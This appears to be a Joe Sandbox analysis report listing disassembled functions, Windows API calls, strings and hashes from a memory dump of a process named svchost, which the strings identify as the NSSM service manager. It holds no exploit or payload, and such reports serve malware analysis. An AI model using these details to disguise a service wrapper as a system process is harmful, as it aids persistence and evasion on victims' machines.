Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Event$ProcessSource$AllocDeregisterErrorFreeLastQueryRegisterReportValue_memset
String ID: get_string()
API String ID: 2603871056-896229945
Opcode ID: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
Instruction ID: 72e98944cf36b2bbc6af698ef9dc07420c8870f262d0e465f671d630dce17b03
Opcode Fuzzy Hash: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
Instruction Fuzzy Hash: 154115B19043006BE310AB58EC09FEB7B9CEF8471AF44457AF549A2182D7B9C954C6AB

Function 00410940 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00410980
GetProcessAffinityMask.KERNEL32(00000000), ref: 00410987

Strings

All, xrefs: 004109A9

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID: All
API String ID: 1231390398-55916349
Opcode ID: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
Instruction ID: 4f50b5df6772471c36ec06a59c3137138f5c5bb65052f92276dbeda9fd140f86
Opcode Fuzzy Hash: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
Instruction Fuzzy Hash: 0371E5B29043016BD710DF69DC85AAB77E8EFC4358F444A2EF944D3341E678ED848B6A

Function 004089B0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160timefileCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004089E3
CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,00000080,00000000), ref: 004089F8
GetFileInformationByHandle.KERNEL32(00000000,?), ref: 00408A0E
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A32
CloseHandle.KERNEL32(00000000), ref: 00408A49
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A5D
CompareFileTime.KERNEL32(?,?,?,00000000,FF676980,000000FF), ref: 00408A90
FileTimeToSystemTime.KERNEL32(?,?), ref: 00408AD6
MoveFileW.KERNEL32(?,?), ref: 00408AF7
GetLastError.KERNEL32 ref: 00408B1D
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408B54
GetLastError.KERNEL32 ref: 00408B5F

Strings

MoveFile(), xrefs: 00408B7F
CreateFile(), xrefs: 00408B34

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Time$File$System$ErrorHandleLast$CloseCompareCreateInformationMove
String ID: CreateFile()$MoveFile()
API String ID: 1279283993-2404744241
Opcode ID: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
Instruction ID: dbd175fc6890c416a4f9d1aeb2e25f209b5034f3b8b6a35462ec3c9fcbbef7c3
Opcode Fuzzy Hash: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
Instruction Fuzzy Hash: 7951B2B1604300AFD321DF50DD85EEF77A8FF88704F44492EF6C992181DB78A9448B6A

Function 004105B0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 223registryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 00410665
RegDeleteValueW.ADVAPI32(00000000,?), ref: 00410678
RegCloseKey.ADVAPI32(00000000), ref: 00410681
__snwprintf_s.LIBCMT ref: 004106E3
__wcsnicmp.LIBCMT ref: 0041070C
_fwprintf.LIBCMT ref: 0041075F
RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 004107D2
GetLastError.KERNEL32(?,?), ref: 004107DC
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00410809
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00410815

Strings

default, xrefs: 004105DE
%s, xrefs: 00410751

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Close$Value__snwprintf_s$DeleteErrorLast__wcsnicmp_fwprintf
String ID: %s$default
API String ID: 3151773479-387093873
Opcode ID: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
Instruction ID: 30a3df3cfbea9975472b600d8026b2d659796aa5a5751022936202a7496980d0
Opcode Fuzzy Hash: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
Instruction Fuzzy Hash: 5F613BB1A043006BD210AB65DD46FEB73989F84308F44452AF95592282F7FCE9D5CAAE

Function 00410090 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 149registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

__snwprintf_s.LIBCMT ref: 004100BB

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegisterServiceCtrlHandlerExW.ADVAPI32(NSSM,0040F310,00000000), ref: 0041016B
GetLastError.KERNEL32(00000000), ref: 0041017C

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

NSSM, xrefs: 0041012E
service_main(), xrefs: 004100C8
service->name, xrefs: 004100CD

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$HeapRegisterSource$AllocCtrlDeregisterErrorHandlerLastProcessReportService__snwprintf_s__vsnwprintf_s_l
String ID: NSSM$service->name$service_main()
API String ID: 4131733493-2082882489
Opcode ID: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
Instruction ID: 09d4c8929dcbfacbdd4c1d483c8683e469f37797597802ee5f3465e219f8d35a
Opcode Fuzzy Hash: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
Instruction Fuzzy Hash: 3851A8F1E40700EFD320AF759C46BD77BA8AB44319F40853FF65E96242D2BD68848B69

Function 00412120 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041219F
HeapFree.KERNEL32(00000000), ref: 004121A6

Strings

LocalSystem, xrefs: 00412186, 004121AE
%s, xrefs: 00412209, 00412224
SERVICE_INTERACTIVE_PROCESS, xrefs: 00412146, 0041221F
SERVICE_WIN32_OWN_PROCESS, xrefs: 004121D5, 00412204

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: %s$LocalSystem$SERVICE_INTERACTIVE_PROCESS$SERVICE_WIN32_OWN_PROCESS
API String ID: 3859560861-1492594695
Opcode ID: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
Instruction ID: ce946582b93cb946955dea2ec205cb75b91bbb2897729394130ecaaa05bb3734
Opcode Fuzzy Hash: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
Instruction Fuzzy Hash: E231C3B3D4420137E6006676BC4AFDB73089F51339F140627F924E62C2FAB9DCD186A9

Function 00401580 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

username_sid, xrefs: 00401689
lsa_canon, xrefs: 0040168E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ErrorOpenPolicyStatus
String ID: lsa_canon$username_sid
API String ID: 3835286460-3440772048
Opcode ID: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
Instruction ID: c21e6304ed427eea8d7a4b8d0c36af05136f334d03c0e194f28452d20308fd16
Opcode Fuzzy Hash: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
Instruction Fuzzy Hash: C641E3B59042017BD300FB69CC96DAB73E9FFC4708F44881EF58897252E678D99487A6

Function 0040EA00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 133memorysynchronizationCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,771AE010,?), ref: 0040EA3B
HeapAlloc.KERNEL32(00000000), ref: 0040EA42
__snwprintf_s.LIBCMT ref: 0040EA5C
__snwprintf_s.LIBCMT ref: 0040EA83
SetServiceStatus.ADVAPI32(?,?), ref: 0040EADA
__snwprintf_s.LIBCMT ref: 0040EAF3
__snwprintf_s.LIBCMT ref: 0040EB07
WaitForSingleObject.KERNEL32(?,?), ref: 0040EB40

Strings

%s(), xrefs: 0040EA53
%lu, xrefs: 0040EA75, 0040EAE5, 0040EAF9

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: __snwprintf_s$Heap$AllocObjectProcessServiceSingleStatusWait
String ID: %lu$%s()
API String ID: 3479796768-699940799
Opcode ID: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
Instruction ID: 89c68062588a5b6a5dcd3b42c23b9f1343587bb4bcf2e221744147efb473305d
Opcode Fuzzy Hash: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
Instruction Fuzzy Hash: 6B41B7B1A04300EBD620DF65DD85F9B73A8FB84714F104A2EB669932C0E778E954CB69

Function 0040A860 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040A88E

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000,00409EC9), ref: 0040A8EB
GetLastError.KERNEL32(00000000), ref: 0040A8F7

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

NSSM, xrefs: 0040A878
SYSTEM\CurrentControlSet\Services\EventLog\Application\%s, xrefs: 0040A87D
EventMessageFile, xrefs: 0040A97E
eventlog registry, xrefs: 0040A8A1
create_messages(), xrefs: 0040A89C
TypesSupported, xrefs: 0040A995

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
API String ID: 508490100-129066941
Opcode ID: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
Instruction ID: 189017753002612d24ec776b8254467aa4e8da1510a31d32c64f91d8f6ef9f68
Opcode Fuzzy Hash: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
Instruction Fuzzy Hash: 0A31CAF1A443006BE210E754CC47FEB7394EB88B08F50452EB659971C2F6F8A5848796

Function 004054A0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC

MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
__strftime_l.LIBCMT ref: 00405516
LocalFree.KERNEL32(00000000), ref: 00405523
MessageBoxW.USER32(00000000,The message which was supposed to go here is too big!,NSSM,00000030), ref: 00405537

Strings

NSSM, xrefs: 004054D9, 0040552B, 004055A4
The message which was supposed to go here is too big!, xrefs: 00405530
e, xrefs: 004055BC
The message which was supposed to go here is missing!, xrefs: 004054DE
(, xrefs: 0040557F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Message$FormatHeap$AllocDefaultFreeLangLocalProcessUser__snwprintf_s__strftime_l
String ID: ($NSSM$The message which was supposed to go here is missing!$The message which was supposed to go here is too big!$e
API String ID: 3053442334-353540380
Opcode ID: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
Instruction ID: 9a0a8de4c5d0dfbf6e97c11b6962cbdff5b354b3c8bec1d6dae1fd1358dc6512
Opcode Fuzzy Hash: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
Instruction Fuzzy Hash: EB315EB1905301AFD350DF29D845B9FBBE4EF88354F40493EF959D2241E7788648CB9A

Function 0040AB70 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,?,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040AB95
GetLastError.KERNEL32(00000000,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040ABBD

Strings

get_environment(), xrefs: 0040AC55

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ErrorLastQueryValue
String ID: get_environment()
API String ID: 1349404517-3013924771
Opcode ID: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
Instruction ID: 1d8989cfc65caa848716c5f45015e9ce7db8ed1eb8c61d39c0da8540bf3f80e9
Opcode Fuzzy Hash: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
Instruction Fuzzy Hash: 2541A1F26043006BE3109B55EC45FA777ACEB8471AF20457EF645E72C1D6B9D440CA66

Function 0040D690 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfig2W.ADVAPI32(00000002,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000002,0040DDED,00000002,?,00000000,00008400), ref: 0040D6D3
GetLastError.KERNEL32 ref: 0040D6DB
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6ED
HeapAlloc.KERNEL32(00000000), ref: 0040D6F4

Strings

SERVICE_CONFIG_DELAYED_AUTO_START_INFO, xrefs: 0040D791
get_service_startup(), xrefs: 0040D700
SERVICE_DELAYED_AUTO_START_INFO, xrefs: 0040D705, 0040D7AC

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocConfig2ErrorLastProcessQueryService
String ID: SERVICE_CONFIG_DELAYED_AUTO_START_INFO$SERVICE_DELAYED_AUTO_START_INFO$get_service_startup()
API String ID: 2527037045-1869567720
Opcode ID: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
Instruction ID: 097b29a2a90f646509759188dcc962e1ab6821ba756d97a4ddf6cf1ac72e26d1
Opcode Fuzzy Hash: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
Instruction Fuzzy Hash: B531D4F6A403016BE310DFA9DC89FAB7798EB84315F54487AF504E7281E778E8448A69

Function 00409130 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114memorypipethreadCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,00000000,00000000), ref: 0040915B
SetHandleInformation.KERNEL32(00000000,00000001,00000001,?,?,00000000,00000000), ref: 0040916C
GetProcessHeap.KERNEL32(00000008,00000030), ref: 00409176
HeapAlloc.KERNEL32(00000000), ref: 0040917D
GetLastError.KERNEL32(?,?,00000000,00000000), ref: 004091A9
CreateThread.KERNEL32(00000000,00000000,Function_00008D50,00000000,00000000,?), ref: 00409222
GetLastError.KERNEL32(00000000), ref: 0040922F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409250
HeapFree.KERNEL32(00000000), ref: 00409257

Strings

logger, xrefs: 0040918F
create_logging_thread(), xrefs: 0040918A

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
String ID: create_logging_thread()$logger
API String ID: 3682172063-2332508298
Opcode ID: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
Instruction ID: 7a5f417da971cce8bdb4d489e7d561c2bea4d1d3adffcb45d960dbf457daacd4
Opcode Fuzzy Hash: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
Instruction Fuzzy Hash: 5731A0B1A00701AFD3209F65DC49F9BB7E8EF88714F10892EF649E7291D674E8408B59

Function 0040E830 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040E8A3
__snwprintf_s.LIBCMT ref: 0040E8ED
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E921
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 0040E95C
SetServiceStatus.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E97A
SleepConditionVariableCS.KERNELBASE(?,?,?), ref: 0040E998
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E99F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9C4
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9DD

Strings

%lu, xrefs: 0040E895, 0040E8DF

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: CriticalSectionSleep__snwprintf_s$ConditionEnterLeaveObjectServiceSingleStatusTimerVariableWaitWaitable
String ID: %lu
API String ID: 418212672-685833217
Opcode ID: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
Instruction ID: 0bcbe74f60e49559a2a01a7623a54cf792aad81448e6a6f2708ebc24a96566d6
Opcode Fuzzy Hash: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
Instruction Fuzzy Hash: 5141DCF1A04700EBD7249B25CC46BDB73D4BB88314F508B2EF25EA61C0E67CA945C759

Function 00410DA0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00410E22
HeapFree.KERNEL32(00000000), ref: 00410E29

Strings

AppEnvironment, xrefs: 00410E96

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: AppEnvironment
API String ID: 3859560861-948859433
Opcode ID: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
Instruction ID: d0ab22901641b4708907b5ad450eb196165ffe8a0ecf88f64d9a13dda8279097
Opcode Fuzzy Hash: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
Instruction Fuzzy Hash: 724106B2A042016BE2009B69EC09FEB37A8DFC4725F14492EF515D62D1DBB8D8C5C76A

Function 0040CD30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,0040DD63,00000003,00000000,00000002,?,0040DD63,00000002,00000000), ref: 0040CD48
GetLastError.KERNEL32(?,0040DD63,00000002,00000000), ref: 0040CD50
GetProcessHeap.KERNEL32(00000008,0040DD63,00000000,?,0040DD63,00000002,00000000), ref: 0040CD63
HeapAlloc.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CD6A
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,0040DD63,00000002,00000000), ref: 0040CD94
GetProcessHeap.KERNEL32(00000000,00000000,?,0040DD63,00000002,00000000), ref: 0040CD9C
HeapFree.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDA3
GetLastError.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDAB

Strings

QUERY_SERVICE_CONFIG, xrefs: 0040CD7C
query_service_config(), xrefs: 0040CD77

Memory Dump Source

